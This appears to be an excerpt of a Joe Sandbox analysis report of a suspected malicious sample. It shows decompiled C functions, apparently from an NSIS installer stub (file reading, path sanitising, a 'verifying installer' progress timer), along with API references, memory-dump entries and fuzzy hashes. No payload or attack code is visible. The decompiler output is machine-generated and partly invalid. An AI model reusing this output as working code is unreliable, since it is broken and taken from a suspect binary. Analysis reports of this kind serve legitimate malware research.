                                                  						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                  						if( *(__ebp - 0x44) > __ebx) {
                                                  							do {
                                                  								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                  									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                  										__eax = __ebp - 0x50;
                                                  										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                  											goto L34;
                                                  										} else {
                                                  											goto L21;
                                                  										}
                                                  									} else {
                                                  										goto L34;
                                                  									}
                                                  								} else {
                                                  									__eax = __ebp - 0x40;
                                                  									_push(__ebx);
                                                  									_push(__ebp - 0x40);
                                                  									__eax = 2;
                                                  									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                  									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                  									if(__eax == 0) {
                                                  										goto L34;
                                                  									} else {
                                                  										__ecx =  *(__ebp - 0x40);
                                                  										if(__ecx == __ebx) {
                                                  											goto L34;
                                                  										} else {
                                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                  											 *(__ebp - 0x4c) = __ecx;
                                                  											 *(__ebp - 0x50) = __eax;
                                                  											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                  												L28:
                                                  												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                  											} else {
                                                  												__ebp - 0x50 = __ebp + 0xa;
                                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                  													L21:
                                                  													__eax =  *(__ebp - 0x50);
                                                  												} else {
                                                  													__edi =  *(__ebp - 0x4c);
                                                  													__edi =  ~( *(__ebp - 0x4c));
                                                  													while(1) {
                                                  														_t22 = __ebp - 0x40;
                                                  														 *_t22 =  *(__ebp - 0x40) - 1;
                                                  														__eax = 0xfffd;
                                                  														 *(__ebp - 0x50) = 0xfffd;
                                                  														if( *_t22 == 0) {
                                                  															goto L22;
                                                  														}
                                                  														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                  														__edi = __edi + 1;
                                                  														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                  														__eax = __ebp + 0xa;
                                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                  															continue;
                                                  														} else {
                                                  															goto L21;
                                                  														}
                                                  														goto L22;
                                                  													}
                                                  												}
                                                  												L22:
                                                  												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                  													goto L28;
                                                  												} else {
                                                  													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                  														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                  															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                  															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                  														} else {
                                                  															__ecx =  *(__ebp - 0xc);
                                                  															__edx =  *(__ebp - 8);
                                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                  														}
                                                  														goto L34;
                                                  													} else {
                                                  														__ecx =  *(__ebp - 0xc);
                                                  														__edx =  *(__ebp - 8);
                                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                  														 *(__ebp - 0x38) = __eax;
                                                  														if(__ax == __bx) {
                                                  															goto L34;
                                                  														} else {
                                                  															goto L26;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L37;
                                                  								L26:
                                                  								__eax =  *(__ebp - 8);
                                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                  						}
                                                  						goto L34;
                                                  					}
                                                  				}
                                                  				L37:
                                                  				return 0;
                                                  			}








                                                  0x004026ec
                                                  0x004026ee
                                                  0x004026f1
                                                  0x004026f3
                                                  0x004026f6
                                                  0x004026fb
                                                  0x004026ff
                                                  0x00402702
                                                  0x00402705
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x0040270b
                                                  0x0040270b
                                                  0x00402712
                                                  0x00402714
                                                  0x00402714
                                                  0x0040271a
                                                  0x0040287e
                                                  0x0040287e
                                                  0x00402881
                                                  0x00402886
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00000000
                                                  0x00402720
                                                  0x00402721
                                                  0x0040272c
                                                  0x0040272f
                                                  0x0040273b
                                                  0x0040273f
                                                  0x004027d7
                                                  0x004027ef
                                                  0x004027ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402745
                                                  0x00402745
                                                  0x00402748
                                                  0x00402749
                                                  0x0040274c
                                                  0x00402751
                                                  0x00402758
                                                  0x00402760
                                                  0x00000000
                                                  0x00402766
                                                  0x00402766
                                                  0x0040276b
                                                  0x00000000
                                                  0x00402771
                                                  0x00402771
                                                  0x00402779
                                                  0x0040277c
                                                  0x0040277f
                                                  0x0040283a
                                                  0x00402841
                                                  0x00402785
                                                  0x0040278b
                                                  0x00402797
                                                  0x00402801
                                                  0x00402801
                                                  0x00402799
                                                  0x00402799
                                                  0x0040279c
                                                  0x0040279e
                                                  0x0040279e
                                                  0x0040279e
                                                  0x004027a1
                                                  0x004027a6
                                                  0x004027a9
                                                  0x00000000
                                                  0x00000000
                                                  0x004027ab
                                                  0x004027ae
                                                  0x004027bc
                                                  0x004027c2
                                                  0x004027d0
                                                  0x00000000
                                                  0x004027d2
                                                  0x00000000
                                                  0x004027d2
                                                  0x00000000
                                                  0x004027d0
                                                  0x0040279e
                                                  0x00402804
                                                  0x00402807
                                                  0x00000000
                                                  0x00402809
                                                  0x0040280e
                                                  0x0040284f
                                                  0x00402871
                                                  0x00402878
                                                  0x0040285d
                                                  0x0040285d
                                                  0x00402860
                                                  0x00402863
                                                  0x00402866
                                                  0x00402866
                                                  0x00000000
                                                  0x00402817
                                                  0x00402817
                                                  0x0040281a
                                                  0x0040281d
                                                  0x00402823
                                                  0x00402827
                                                  0x0040282a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040282a
                                                  0x0040280e
                                                  0x00402807
                                                  0x0040277f
                                                  0x0040276b
                                                  0x00402760
                                                  0x00000000
                                                  0x0040282c
                                                  0x0040282c
                                                  0x0040282f
                                                  0x00402838
                                                  0x00000000
                                                  0x0040272f
                                                  0x0040271a
                                                  0x00402c33
                                                  0x00402c39

                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                    • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                  • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                  • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                  • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E73202480(void* __edx) {
                                                  				void* _t37;
                                                  				signed int _t38;
                                                  				void* _t39;
                                                  				void* _t41;
                                                  				signed char* _t42;
                                                  				signed char* _t51;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  
                                                  				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                  				while(1) {
                                                  					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                  					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                  					_t52 = _t51[0x18];
                                                  					if(_t52 == 0) {
                                                  						goto L9;
                                                  					}
                                                  					_t41 = 0x1a;
                                                  					if(_t52 == _t41) {
                                                  						goto L9;
                                                  					}
                                                  					if(_t52 != 0xffffffff) {
                                                  						if(_t52 <= 0 || _t52 > 0x19) {
                                                  							_t51[0x18] = _t41;
                                                  							goto L12;
                                                  						} else {
                                                  							_t37 = E7320135A(_t52 - 1);
                                                  							L10:
                                                  							goto L11;
                                                  						}
                                                  					} else {
                                                  						_t37 = E732012E3();
                                                  						L11:
                                                  						_t52 = _t37;
                                                  						L12:
                                                  						_t13 =  &(_t51[8]); // 0x1020
                                                  						_t42 = _t13;
                                                  						if(_t51[4] >= 0) {
                                                  						}
                                                  						_t38 =  *_t51 & 0x000000ff;
                                                  						_t51[0x1c] = 0;
                                                  						if(_t38 > 7) {
                                                  							L27:
                                                  							_t39 = GlobalFree(_t52);
                                                  							if( *(_t54 + 0x10) == 0) {
                                                  								return _t39;
                                                  							}
                                                  							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                  							} else {
                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                  							}
                                                  							continue;
                                                  						} else {
                                                  							switch( *((intOrPtr*)(_t38 * 4 +  &M732025F8))) {
                                                  								case 0:
                                                  									 *_t42 = 0;
                                                  									goto L27;
                                                  								case 1:
                                                  									__eax = E732013B1(__ebp);
                                                  									goto L21;
                                                  								case 2:
                                                  									 *__edi = E732013B1(__ebp);
                                                  									__edi[1] = __edx;
                                                  									goto L27;
                                                  								case 3:
                                                  									__eax = GlobalAlloc(0x40,  *0x7320506c);
                                                  									 *(__esi + 0x1c) = __eax;
                                                  									__edx = 0;
                                                  									 *__edi = __eax;
                                                  									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7320506c, __eax,  *0x7320506c, 0, 0);
                                                  									goto L27;
                                                  								case 4:
                                                  									__eax = E732012CC(__ebp);
                                                  									 *(__esi + 0x1c) = __eax;
                                                  									L21:
                                                  									 *__edi = __eax;
                                                  									goto L27;
                                                  								case 5:
                                                  									__eax = GlobalAlloc(0x40, 0x10);
                                                  									_push(__eax);
                                                  									 *(__esi + 0x1c) = __eax;
                                                  									_push(__ebp);
                                                  									 *__edi = __eax;
                                                  									__imp__CLSIDFromString();
                                                  									goto L27;
                                                  								case 6:
                                                  									if( *__ebp != __cx) {
                                                  										__eax = E732013B1(__ebp);
                                                  										 *__ebx = __eax;
                                                  									}
                                                  									goto L27;
                                                  								case 7:
                                                  									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                  									( *(__esi + 0x18) - 1) *  *0x7320506c =  *0x73205074 + ( *(__esi + 0x18) - 1) *  *0x7320506c * 2 + 0x18;
                                                  									 *__ebx =  *0x73205074 + ( *(__esi + 0x18) - 1) *  *0x7320506c * 2 + 0x18;
                                                  									asm("cdq");
                                                  									__eax = E73201510(__edx,  *0x73205074 + ( *(__esi + 0x18) - 1) *  *0x7320506c * 2 + 0x18, __edx,  *0x73205074 + ( *(__esi + 0x18) - 1) *  *0x7320506c * 2);
                                                  									goto L27;
                                                  							}
                                                  						}
                                                  					}
                                                  					L9:
                                                  					_t37 = E732012CC(0x73205044);
                                                  					goto L10;
                                                  				}
                                                  			}











                                                  0x73202494
                                                  0x73202498
                                                  0x732024a3
                                                  0x732024a3
                                                  0x732024aa
                                                  0x732024af
                                                  0x00000000
                                                  0x00000000
                                                  0x732024b3
                                                  0x732024b6
                                                  0x00000000
                                                  0x00000000
                                                  0x732024bb
                                                  0x732024c6
                                                  0x732024d6
                                                  0x00000000
                                                  0x732024cd
                                                  0x732024cf
                                                  0x732024e5
                                                  0x00000000
                                                  0x732024e5
                                                  0x732024bd
                                                  0x732024bd
                                                  0x732024e6
                                                  0x732024e6
                                                  0x732024e8
                                                  0x732024ec
                                                  0x732024ec
                                                  0x732024ef
                                                  0x732024ef
                                                  0x732024f7
                                                  0x732024ff
                                                  0x73202502
                                                  0x732025c1
                                                  0x732025c2
                                                  0x732025cd
                                                  0x732025f7
                                                  0x732025f7
                                                  0x732025dd
                                                  0x732025e9
                                                  0x732025df
                                                  0x732025df
                                                  0x732025df
                                                  0x00000000
                                                  0x73202508
                                                  0x73202508
                                                  0x00000000
                                                  0x7320250f
                                                  0x00000000
                                                  0x00000000
                                                  0x73202517
                                                  0x00000000
                                                  0x00000000
                                                  0x73202525
                                                  0x73202527
                                                  0x00000000
                                                  0x00000000
                                                  0x73202548
                                                  0x7320254e
                                                  0x73202551
                                                  0x73202553
                                                  0x73202563
                                                  0x00000000
                                                  0x00000000
                                                  0x73202530
                                                  0x73202535
                                                  0x73202538
                                                  0x73202539
                                                  0x00000000
                                                  0x00000000
                                                  0x7320256f
                                                  0x73202575
                                                  0x73202576
                                                  0x73202579
                                                  0x7320257a
                                                  0x7320257c
                                                  0x00000000
                                                  0x00000000
                                                  0x73202588
                                                  0x7320258b
                                                  0x73202597
                                                  0x73202599
                                                  0x00000000
                                                  0x00000000
                                                  0x732025a5
                                                  0x732025b1
                                                  0x732025b4
                                                  0x732025b6
                                                  0x732025b9
                                                  0x00000000
                                                  0x00000000
                                                  0x73202508
                                                  0x73202502
                                                  0x732024db
                                                  0x732024e0
                                                  0x00000000
                                                  0x732024e0

                                                  APIs
                                                  • GlobalFree.KERNEL32 ref: 732025C2
                                                    • Part of subcall function 732012CC: lstrcpynW.KERNEL32(00000000,?,7320137F,00000019,732011CA,-000000A0), ref: 732012DC
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 73202548
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73202563
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID: @u<u
                                                  • API String ID: 4216380887-3153514966
                                                  • Opcode ID: 3f3e7b8bbafd55521a79977508b82530e39c43b13825fa52b13737164ad86a99
                                                  • Instruction ID: b82b3fa970bd72de5dc58e7c61a82f3a811c04b992501cb81b8f1a0e31d777ab
                                                  • Opcode Fuzzy Hash: 3f3e7b8bbafd55521a79977508b82530e39c43b13825fa52b13737164ad86a99
                                                  • Instruction Fuzzy Hash: 7241E0B1108309DFE718EF64D984B2A7BF9FB48314F20891EE94A87181E774A5CCCB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E004067C4(WCHAR* _a4) {
                                                  				short _t5;
                                                  				short _t7;
                                                  				WCHAR* _t19;
                                                  				WCHAR* _t20;
                                                  				WCHAR* _t21;
                                                  
                                                  				_t20 = _a4;
                                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                  					_t20 =  &(_t20[4]);
                                                  				}
                                                  				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                  					_t20 =  &(_t20[2]);
                                                  				}
                                                  				_t5 =  *_t20;
                                                  				_t21 = _t20;
                                                  				_t19 = _t20;
                                                  				if(_t5 != 0) {
                                                  					do {
                                                  						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                  							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                  							_t19 = CharNextW(_t19);
                                                  						}
                                                  						_t20 = CharNextW(_t20);
                                                  						_t5 =  *_t20;
                                                  					} while (_t5 != 0);
                                                  				}
                                                  				 *_t19 =  *_t19 & 0x00000000;
                                                  				while(1) {
                                                  					_push(_t19);
                                                  					_push(_t21);
                                                  					_t19 = CharPrevW();
                                                  					_t7 =  *_t19;
                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                  						break;
                                                  					}
                                                  					 *_t19 =  *_t19 & 0x00000000;
                                                  					if(_t21 < _t19) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				return _t7;
                                                  			}








                                                  0x004067c6
                                                  0x004067cf
                                                  0x004067e6
                                                  0x004067e6
                                                  0x004067ed
                                                  0x004067f9
                                                  0x004067f9
                                                  0x004067fc
                                                  0x004067ff
                                                  0x00406804
                                                  0x00406806
                                                  0x0040680f
                                                  0x00406813
                                                  0x00406830
                                                  0x00406838
                                                  0x00406838
                                                  0x0040683d
                                                  0x0040683f
                                                  0x00406842
                                                  0x00406847
                                                  0x00406848
                                                  0x0040684c
                                                  0x0040684c
                                                  0x0040684d
                                                  0x00406854
                                                  0x00406856
                                                  0x0040685d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406865
                                                  0x0040686b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040686b
                                                  0x00406870

                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7519FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                  • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                  • CharNextW.USER32(?,00000000,7519FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                  • CharPrevW.USER32(?,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-1201062745
                                                  • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                  • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                  • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                  • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                  				long _v8;
                                                  				signed char _v12;
                                                  				unsigned int _v16;
                                                  				void* _v20;
                                                  				intOrPtr _v24;
                                                  				long _v56;
                                                  				void* _v60;
                                                  				long _t15;
                                                  				unsigned int _t19;
                                                  				signed int _t25;
                                                  				struct HWND__* _t28;
                                                  
                                                  				_t28 = _a4;
                                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                  				if(_a8 == 0) {
                                                  					L4:
                                                  					_v56 = _t15;
                                                  					_v60 = 4;
                                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                  					return _v24;
                                                  				}
                                                  				_t19 = GetMessagePos();
                                                  				_v16 = _t19 >> 0x10;
                                                  				_v20 = _t19;
                                                  				ScreenToClient(_t28,  &_v20);
                                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                  				if((_v12 & 0x00000066) != 0) {
                                                  					_t15 = _v8;
                                                  					goto L4;
                                                  				}
                                                  				return _t25 | 0xffffffff;
                                                  			}














                                                  0x00404e62
                                                  0x00404e6f
                                                  0x00404e75
                                                  0x00404eb3
                                                  0x00404eb3
                                                  0x00404ec2
                                                  0x00404ec9
                                                  0x00000000
                                                  0x00404ecb
                                                  0x00404e77
                                                  0x00404e86
                                                  0x00404e8e
                                                  0x00404e91
                                                  0x00404ea3
                                                  0x00404ea9
                                                  0x00404eb0
                                                  0x00000000
                                                  0x00404eb0
                                                  0x00000000

                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                  • GetMessagePos.USER32 ref: 00404E77
                                                  • ScreenToClient.USER32 ref: 00404E91
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                  				short _v132;
                                                  				int _t11;
                                                  				int _t20;
                                                  
                                                  				if(_a8 == 0x110) {
                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                  					_a8 = 0x113;
                                                  				}
                                                  				if(_a8 == 0x113) {
                                                  					_t20 =  *0x41ea18; // 0x160cd
                                                  					_t11 =  *0x42aa24;
                                                  					if(_t20 >= _t11) {
                                                  						_t20 = _t11;
                                                  					}
                                                  					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                  					SetWindowTextW(_a4,  &_v132);
                                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                  				}
                                                  				return 0;
                                                  			}






                                                  0x00402fa3
                                                  0x00402fb1
                                                  0x00402fb7
                                                  0x00402fb7
                                                  0x00402fc5
                                                  0x00402fc7
                                                  0x00402fcd
                                                  0x00402fd4
                                                  0x00402fd6
                                                  0x00402fd6
                                                  0x00402fec
                                                  0x00402ffc
                                                  0x0040300e
                                                  0x0040300e
                                                  0x00403016

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                  • MulDiv.KERNEL32(000160CD,00000064,?), ref: 00402FDC
                                                  • wsprintfW.USER32 ref: 00402FEC
                                                  • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                  • SetDlgItemTextW.USER32 ref: 0040300E
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402FE6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                  • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                  • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                  • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E00402950(int __ebx, void* __eflags) {
                                                  				WCHAR* _t26;
                                                  				void* _t29;
                                                  				long _t37;
                                                  				int _t49;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  				void* _t56;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t49 = __ebx;
                                                  				_t52 = 0xfffffd66;
                                                  				_t26 = E00402DA6(0xfffffff0);
